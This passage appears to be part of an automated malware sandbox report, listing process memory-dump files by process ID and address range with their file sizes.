                                      • memory/1084-80-0x0000000000000000-mapping.dmp
                                      • memory/1088-198-0x0000000000000000-mapping.dmp
                                      • memory/1092-92-0x0000000000000000-mapping.dmp
                                      • memory/1096-290-0x00000000002D0000-0x00000000002FA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1112-56-0x000007FEFB801000-0x000007FEFB803000-memory.dmp
                                        Filesize

                                        8KB

                                      • memory/1112-54-0x000000013F1B0000-0x000000013F458000-memory.dmp
                                        Filesize

                                        2.7MB

                                      • memory/1112-55-0x000000001C130000-0x000000001C3BE000-memory.dmp
                                        Filesize

                                        2.6MB

                                      • memory/1112-94-0x00000000025E0000-0x00000000025E6000-memory.dmp
                                        Filesize

                                        24KB

                                      • memory/1144-296-0x0000000001EC0000-0x0000000001EEA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1168-291-0x0000000001010000-0x000000000103A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1168-120-0x0000000000000000-mapping.dmp
                                      • memory/1168-123-0x000000013F200000-0x000000013F4A8000-memory.dmp
                                        Filesize

                                        2.7MB

                                      • memory/1212-67-0x0000000000000000-mapping.dmp
                                      • memory/1216-192-0x0000000000000000-mapping.dmp
                                      • memory/1228-74-0x0000000000000000-mapping.dmp
                                      • memory/1228-208-0x0000000000000000-mapping.dmp
                                      • memory/1240-284-0x00000000001D0000-0x00000000001FA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1272-297-0x0000000002AC0000-0x0000000002AEA000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1272-305-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/1292-81-0x0000000000000000-mapping.dmp
                                      • memory/1364-112-0x0000000000000000-mapping.dmp
                                      • memory/1372-193-0x0000000000000000-mapping.dmp
                                      • memory/1388-87-0x0000000000000000-mapping.dmp
                                      • memory/1436-72-0x0000000000000000-mapping.dmp
                                      • memory/1452-82-0x0000000000000000-mapping.dmp
                                      • memory/1464-195-0x0000000000000000-mapping.dmp
                                      • memory/1536-205-0x0000000000060000-0x0000000000067000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/1536-264-0x0000000000000000-mapping.dmp
                                      • memory/1536-71-0x0000000000000000-mapping.dmp
                                      • memory/1536-304-0x0000000000060000-0x0000000000067000-memory.dmp
                                        Filesize

                                        28KB

                                      • memory/1572-187-0x0000000000000000-mapping.dmp
                                      • memory/1588-90-0x0000000000000000-mapping.dmp
                                      • memory/1592-91-0x0000000000000000-mapping.dmp
                                      • memory/1612-88-0x0000000000000000-mapping.dmp
                                      • memory/1628-114-0x0000000000000000-mapping.dmp
                                      • memory/1636-288-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/1636-287-0x0000000000270000-0x000000000029A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1676-285-0x0000000000140000-0x000000000016A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1716-189-0x0000000000000000-mapping.dmp
                                      • memory/1748-273-0x0000000000000000-mapping.dmp
                                      • memory/1756-286-0x0000000000460000-0x000000000048A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/1760-77-0x0000000000000000-mapping.dmp
                                      • memory/1764-117-0x0000000000000000-mapping.dmp
                                      • memory/1808-191-0x0000000000000000-mapping.dmp
                                      • memory/1812-147-0x0000000076E60000-0x0000000076F7F000-memory.dmp
                                        Filesize

                                        1.1MB

                                      • memory/1812-145-0x0000000076F80000-0x0000000077129000-memory.dmp
                                        Filesize

                                        1.7MB

                                      • memory/1812-125-0x0000000000000000-mapping.dmp
                                      • memory/1812-128-0x000007FEEE0F0000-0x000007FEEEB13000-memory.dmp
                                        Filesize

                                        10.1MB

                                      • memory/1812-129-0x000007FEED590000-0x000007FEEE0ED000-memory.dmp
                                        Filesize

                                        11.4MB

                                      • memory/1812-130-0x0000000000FE4000-0x0000000000FE7000-memory.dmp
                                        Filesize

                                        12KB

                                      • memory/1812-131-0x0000000000FEB000-0x000000000100A000-memory.dmp
                                        Filesize

                                        124KB

                                      • memory/1812-133-0x0000000076F80000-0x0000000077129000-memory.dmp
                                        Filesize

                                        1.7MB

                                      • memory/1812-136-0x0000000076E60000-0x0000000076F7F000-memory.dmp
                                        Filesize

                                        1.1MB

                                      • memory/1812-141-0x0000000000FE4000-0x0000000000FE7000-memory.dmp
                                        Filesize

                                        12KB

                                      • memory/1812-144-0x0000000000FEB000-0x000000000100A000-memory.dmp
                                        Filesize

                                        124KB

                                      • memory/1820-171-0x0000000000400000-0x0000000000435000-memory.dmp
                                        Filesize

                                        212KB

                                      • memory/1820-168-0x00000000004039E0-mapping.dmp
                                      • memory/1820-183-0x00000000000E0000-0x00000000000FB000-memory.dmp
                                        Filesize

                                        108KB

                                      • memory/1820-167-0x0000000000400000-0x0000000000435000-memory.dmp
                                        Filesize

                                        212KB

                                      • memory/1820-89-0x0000000000000000-mapping.dmp
                                      • memory/1820-181-0x0000000000400000-0x0000000000435000-memory.dmp
                                        Filesize

                                        212KB

                                      • memory/1820-182-0x0000000077160000-0x00000000772E0000-memory.dmp
                                        Filesize

                                        1.5MB

                                      • memory/1820-184-0x0000000000260000-0x0000000000281000-memory.dmp
                                        Filesize

                                        132KB

                                      • memory/1856-59-0x000007FEED210000-0x000007FEEDC33000-memory.dmp
                                        Filesize

                                        10.1MB

                                      • memory/1856-57-0x0000000000000000-mapping.dmp
                                      • memory/1856-62-0x00000000025FB000-0x000000000261A000-memory.dmp
                                        Filesize

                                        124KB

                                      • memory/1856-63-0x00000000025F4000-0x00000000025F7000-memory.dmp
                                        Filesize

                                        12KB

                                      • memory/1856-61-0x00000000025F4000-0x00000000025F7000-memory.dmp
                                        Filesize

                                        12KB

                                      • memory/1856-64-0x00000000025FB000-0x000000000261A000-memory.dmp
                                        Filesize

                                        124KB

                                      • memory/1856-60-0x000007FEEC6B0000-0x000007FEED20D000-memory.dmp
                                        Filesize

                                        11.4MB

                                      • memory/1860-194-0x0000000000000000-mapping.dmp
                                      • memory/1860-83-0x0000000000000000-mapping.dmp
                                      • memory/1864-101-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-95-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-118-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-106-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-103-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-102-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-96-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-109-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-113-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-105-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-107-0x0000000140001844-mapping.dmp
                                      • memory/1864-98-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1864-100-0x0000000140000000-0x0000000140056000-memory.dmp
                                        Filesize

                                        344KB

                                      • memory/1908-115-0x0000000000000000-mapping.dmp
                                      • memory/1912-75-0x0000000000000000-mapping.dmp
                                      • memory/1920-137-0x0000000000000000-mapping.dmp
                                      • memory/1920-186-0x000000000130B000-0x000000000132A000-memory.dmp
                                        Filesize

                                        124KB

                                      • memory/1920-165-0x0000000001304000-0x0000000001307000-memory.dmp
                                        Filesize

                                        12KB

                                      • memory/1920-160-0x000007FEED0E0000-0x000007FEEDC3D000-memory.dmp
                                        Filesize

                                        11.4MB

                                      • memory/1920-156-0x000007FEF2320000-0x000007FEF2D43000-memory.dmp
                                        Filesize

                                        10.1MB

                                      • memory/1920-185-0x0000000001304000-0x0000000001307000-memory.dmp
                                        Filesize

                                        12KB

                                      • memory/1952-190-0x0000000000000000-mapping.dmp
                                      • memory/1968-76-0x0000000000000000-mapping.dmp
                                      • memory/1980-65-0x0000000000000000-mapping.dmp
                                      • memory/1992-66-0x0000000000000000-mapping.dmp